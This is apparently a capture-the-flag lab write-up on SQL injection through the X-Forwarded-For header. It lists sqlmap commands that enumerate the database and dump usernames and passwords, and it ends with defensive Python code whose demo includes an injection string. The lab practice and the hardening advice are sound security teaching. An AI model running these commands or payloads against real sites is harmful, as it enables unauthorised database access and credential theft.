Mozhe Academy (墨者学院) - X-Forwarded-For Injection Vulnerability Lab
2022-06-26 23:42:00 【Lyswbb】
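The challenge title tells us that the vulnerability is in the X-Forwarded-For (XFF) header.

Visiting the target shows nothing but an admin login page.

Enter any username and password and capture the request with Burp. When the request has no XFF header, the page displays your real IP address.

After adding an XFF header the displayed IP changes, which proves that the backend takes the client IP from XFF.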

Try injecting into XFF and let sqlmap do the whole job:
python sqlmap.py -r 1.txt -p X-Forwarded-For
Enumerate the database names:
python sqlmap.py -r 1.txt -p X-Forwarded-For --dbs
Enumerate the table names:
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar --tables
Enumerate the column names:
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar -T user --columns
Dump all the data in the username column:
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar -T user -C username --dump
Dump all the data in the password column:
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar -T user -C password --dump
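
The root cause shown above is a backend that trusts XFF as the client IP and lets it reach a SQL statement. The following is an added example, not code from the lab or the original post, of how that handling can be hardened. The trusted proxy range, the `login_log` table and the function names are assumptions made for illustration.

```python
import ipaddress
import sqlite3

# Assumption: only reverse proxies in this range may set X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def is_trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)

def client_ip(remote_addr, xff):
    """Return the client IP as a validated string.

    XFF is honoured only when the TCP peer is a trusted proxy, and every
    hop must parse as an IP address; anything else falls back to the peer.
    """
    peer = ipaddress.ip_address(remote_addr)
    if xff is None or not is_trusted(peer):
        return str(peer)
    # Walk right to left: our own proxies append on the right, so the
    # first hop that is not a trusted proxy is the real client.
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed header value: ignore XFF entirely
        if not is_trusted(addr):
            return str(addr)
    return str(peer)

def record_login(db, username, ip):
    # Bound parameters: the header value never becomes part of the SQL text.
    db.execute("INSERT INTO login_log (username, ip) VALUES (?, ?)", (username, ip))

def demo():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_log (username TEXT, ip TEXT)")
    # Constructed sample requests: (TCP peer address, X-Forwarded-For header)
    samples = [
        ("203.0.113.7", "1.2.3.4"),              # direct client: header ignored
        ("10.0.0.5", "198.51.100.9, 10.0.0.8"),  # arrived through trusted proxies
        ("10.0.0.5", "1.2.3.4' AND '1'='1"),     # not an IP address: rejected
    ]
    for peer, xff in samples:
        record_login(db, "admin", client_ip(peer, xff))
    return [r[0] for r in db.execute("SELECT ip FROM login_log ORDER BY rowid")]
```

Either control alone would stop the injection seen in this lab; using both also keeps spoofed addresses out of the login audit trail.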
